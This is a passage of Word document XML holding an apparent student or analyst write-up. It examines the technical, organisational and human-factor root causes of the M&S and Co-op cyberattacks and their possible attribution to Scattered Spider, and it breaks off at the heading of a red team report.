          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37887FFC" w14:textId="73D243B3" w:rsidR="00C17ABC" w:rsidRPr="00E459F0" w:rsidRDefault="00C17ABC" w:rsidP="007D29E2">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E459F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Technical Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29250446" w14:textId="77777777" w:rsidR="0030609C" w:rsidRPr="00433834" w:rsidRDefault="00C17ABC" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>A central technical root cause in both incidents was the mismanagement of identity and access controls. Attackers exploited weaknesses in authentication workflows, particularly through social engineering of help</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>desk personnel, which enabled credential resets and MFA bypass. This indicates a failure of identity governance controls, such as strict verification procedures, privileged access management (PAM), and adaptive MFA policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D1AA0" w14:textId="77777777" w:rsidR="0030609C" w:rsidRPr="00433834" w:rsidRDefault="0030609C" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE173FF" w14:textId="0C21A895" w:rsidR="00C17ABC" w:rsidRPr="00433834" w:rsidRDefault="0030609C" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C17ABC" w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">In the M&amp;S case, attackers were able to steal the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C17ABC" w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C17ABC" w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Directory database, suggesting inadequate segmentation of domain controllers, insufficient monitoring of directory access, and weak credential</w:t>
      </w:r>
      <w:r w:rsidR="00C17ABC" w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>hardening practices. The ability to crack passwords offline points to the use of weak hashing algorithms or password complexity gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B1BEE" w14:textId="77777777" w:rsidR="002B75DF" w:rsidRPr="00433834" w:rsidRDefault="002B75DF" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Both incidents also revealed failures in network segmentation. Once attackers gained initial access, they moved laterally across systems using remote services (T1021), indicating that internal networks lacked proper east</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>west traffic controls, micro</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>segmentation, and least</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">privilege access boundaries. The deployment of ransomware across virtualised infrastructure (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00433834">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> servers) further suggests that management interfaces were exposed, unpatched, or insufficiently isolated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B4BF4" w14:textId="77777777" w:rsidR="002B75DF" w:rsidRPr="008E34EC" w:rsidRDefault="002B75DF" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597E86CB" w14:textId="211DCF52" w:rsidR="005F1487" w:rsidRDefault="002B75DF" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E34EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Finally, the impact on supply</w:t>
      </w:r>
      <w:r w:rsidRPr="008E34EC">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="008E34EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>chain and forecasting</w:t>
      </w:r>
      <w:r w:rsidRPr="002B75DF">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems highlights weaknesses in resilience engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="002B75DF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="002B75DF">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>specifically, the absence of robust backup integrity checks, immutable storage, and tested recovery procedures. The prolonged downtime at M&amp;S, where online services remained offline for weeks, demonstrates that recovery controls were either inadequate or not designed for a full</w:t>
      </w:r>
      <w:r w:rsidRPr="002B75DF">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="002B75DF">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>scale ransomware scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1A011" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513CFD31" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0230A57B" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13072AE1" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRPr="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F74EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Organisational Shortcomings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1504B17D" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>At an organisational level, both retailers suffered from over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>reliance on third</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>party vendors without sufficient oversight. The exploitation of help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>desk contractors and external IT support indicates gaps in vendor risk management, including insufficient vetting, weak contractual security requirements, and lack of continuous monitoring of third</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>party access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019C147" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2718BBD4" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Policies governing identity lifecycle management also appear to have been weak or inconsistently enforced. The attackers’ ability to obtain valid credentials and escalate privileges suggests that privileged accounts were not tightly controlled, monitored, or rotated. This reflects a broader governance issue: cybersecurity policies existed but were not operationalised effectively across teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA7161" w14:textId="77777777" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50516A80" w14:textId="0F0C8D61" w:rsidR="00F74EDE" w:rsidRDefault="00F74EDE" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Additionally, the scale of disruption—empty shelves at Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>op and weeks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>long outages at M&amp;S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>reveals a lack of business continuity planning aligned with modern cyber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>threat scenarios. Retailers underestimated the operational dependency on digital systems and did not maintain sufficient manual fallback processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BB75E2" w14:textId="77777777" w:rsidR="00DB02B5" w:rsidRDefault="00DB02B5" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38313841" w14:textId="77777777" w:rsidR="00DB02B5" w:rsidRDefault="00DB02B5" w:rsidP="00F74EDE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D2AED3" w14:textId="77777777" w:rsidR="00DB02B5" w:rsidRPr="00774A59" w:rsidRDefault="00DB02B5" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Human</w:t>
      </w:r>
      <w:r w:rsidRPr="00774A59">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00774A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Factor Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64F5B3" w14:textId="77777777" w:rsidR="00FE2BC4" w:rsidRDefault="00FE2BC4" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A89A0A0" w14:textId="77777777" w:rsidR="00DB02B5" w:rsidRDefault="00DB02B5" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Human error played a decisive role in both breaches. Social engineering (T1566) succeeded because staff were not adequately trained to recognise sophisticated impersonation attempts. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>desk personnel, in particular, lacked verification protocols to validate identity before resetting credentials or approving MFA requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE42160" w14:textId="77777777" w:rsidR="00DB02B5" w:rsidRDefault="00DB02B5" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1E76C8" w14:textId="26E10E1C" w:rsidR="00DB02B5" w:rsidRDefault="00DB02B5" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The success of MFA fatigue attacks (T1621) also reflects a behavioural vulnerability: employees were conditioned to approve prompts without scrutiny. This indicates insufficient security awareness training, especially around identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65B821" w14:textId="77777777" w:rsidR="00590408" w:rsidRDefault="00590408" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D3BE2C" w14:textId="77777777" w:rsidR="00590408" w:rsidRDefault="00590408" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B58A713" w14:textId="77777777" w:rsidR="00590408" w:rsidRDefault="00590408" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FBAD0B" w14:textId="77777777" w:rsidR="00590408" w:rsidRDefault="00590408" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DE1891" w14:textId="77777777" w:rsidR="00590408" w:rsidRDefault="00590408" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3391BFAF" w14:textId="77777777" w:rsidR="00581970" w:rsidRDefault="00581970" w:rsidP="00581970">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55590C3D" w14:textId="502842A6" w:rsidR="00590408" w:rsidRDefault="00581970" w:rsidP="00581970">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Attribution for the M&amp;S and Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>op cyberattacks is not formally confirmed, but the observed tactics, techniques, and operational behaviour strongly align with financially motivated, high</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>capability ransomware groups, particularly those associated with Scattered Spider (UNC3944 / Octo Tempest). This group is known for advanced social engineering, identity compromise, and double</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>extortion ransomware campaigns</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00581970">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>patterns consistent with the disruption experienced by M&amp;S, including the shutdown of online orders, forecasting systems, and the resulting £300 million projected profit loss and £1 billion market value drop .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1935269B" w14:textId="77777777" w:rsidR="005A17FB" w:rsidRDefault="005A17FB" w:rsidP="00581970">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9ECF24" w14:textId="77777777" w:rsidR="005A17FB" w:rsidRDefault="005A17FB" w:rsidP="00581970">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E521CFF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2F35CE" w14:textId="6D85EE18" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Red Team Assessment Report for ABCD Ltd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61301180" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345ED7F0" w14:textId="2E0A66DA" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004708CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358EE476" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004708CB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
